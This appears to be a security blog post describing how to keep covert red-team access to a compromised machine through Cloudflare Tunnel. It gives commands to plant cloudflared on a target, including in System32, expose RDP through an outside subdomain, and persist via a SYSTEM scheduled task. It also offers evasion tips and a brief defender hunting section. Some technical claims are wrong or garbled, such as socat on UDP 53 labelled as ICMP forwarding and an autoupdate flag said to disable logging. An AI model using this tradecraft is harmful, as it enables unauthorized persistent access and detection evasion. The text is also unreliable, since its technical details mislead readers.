Maintaining Red Team Access with Cloudflare Tunnel

Listen to this Post

Featured Image
Cloudflare Tunnel offers a stealthy way to maintain access in a red team engagement while avoiding traditional C2 infrastructure headaches. By leveraging Cloudflare’s legitimate IPs and services, you can proxy multiple protocols (TCP, UDP, ICMP) through a Wrap Client, enabling RDP, port scanning, and even ping traffic—all while appearing as normal Cloudflare traffic.

You Should Know:

1. Setting Up Cloudflare Tunnel

Install `cloudflared` (Cloudflare’s tunneling daemon) on your target machine:

 Linux (Debian/Ubuntu) 
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb 
sudo dpkg -i cloudflared-linux-amd64.deb

Windows (PowerShell) 
Invoke-WebRequest -Uri "https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.exe" -OutFile "C:\Windows\System32\cloudflared.exe" 

2. Authenticate & Configure Tunnel

cloudflared tunnel login 
cloudflared tunnel create <TUNNEL_NAME> 

Edit the config file (`~/.cloudflared/config.yml`):

tunnel: <TUNNEL_ID> 
credentials-file: /root/.cloudflared/<TUNNEL_ID>.json

ingress: 
- hostname: your-subdomain.example.com 
service: tcp://localhost:3389  RDP example 
- service: http_status:404 

3. Proxy Non-HTTP Traffic (TCP/UDP/ICMP)

Use `cloudflared` to forward arbitrary protocols:

 Forward RDP (TCP) 
cloudflared access tcp --hostname rdp.example.com --url tcp://localhost:3389

Forward ICMP (ping) via raw socket proxy (requires additional setup) 
socat UDP4-LISTEN:53,fork EXEC:"cloudflared access udp --hostname ping.example.com" 

4. Run the Tunnel Persistently

 Linux (Systemd) 
sudo cloudflared service install 
sudo systemctl start cloudflared

Windows (Persistence via Scheduled Task) 
schtasks /create /tn "Cloudflare Tunnel" /tr "C:\Windows\System32\cloudflared.exe tunnel run" /sc onstart /ru SYSTEM 

5. Evasion & OPSEC

  • Use Cloudflare’s WARP client for full traffic masking.
  • Route traffic through legitimate Cloudflare IPs (dig +short A your-subdomain.example.com).
  • Avoid logging by disabling Cloudflare analytics:
    cloudflared tunnel --no-autoupdate run <TUNNEL_NAME> 
    

What Undercode Say

Cloudflare Tunnel is a game-changer for red teams, blending legitimacy with flexibility. However:
– Detection Risks: Unusual `cloudflared` processes or config files may trigger EDR.
– Logging: Cloudflare retains logs; rotate endpoints frequently.
– Alternative Tools: Consider Ngrok TCP tunnels or Tailscale exit nodes for similar functionality.

For defenders:

 Hunt for Cloudflare Tunnels (Linux) 
ps aux | grep cloudflared 
lsof -i | grep cloudflared 
netstat -tulnp | grep cloudflared 

Expected Output:

A stealthy, persistent tunnel that bypasses traditional C2 detection while enabling full protocol flexibility.

Prediction

As Cloudflare Tunnel adoption grows, defenders will develop more advanced detection rules, leading to a cat-and-mouse game between red teams and blue teams over legitimate tunneling services.

Relevant URLs:

IT/Security Reporter URL:

Reported By: Harvey Spec – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram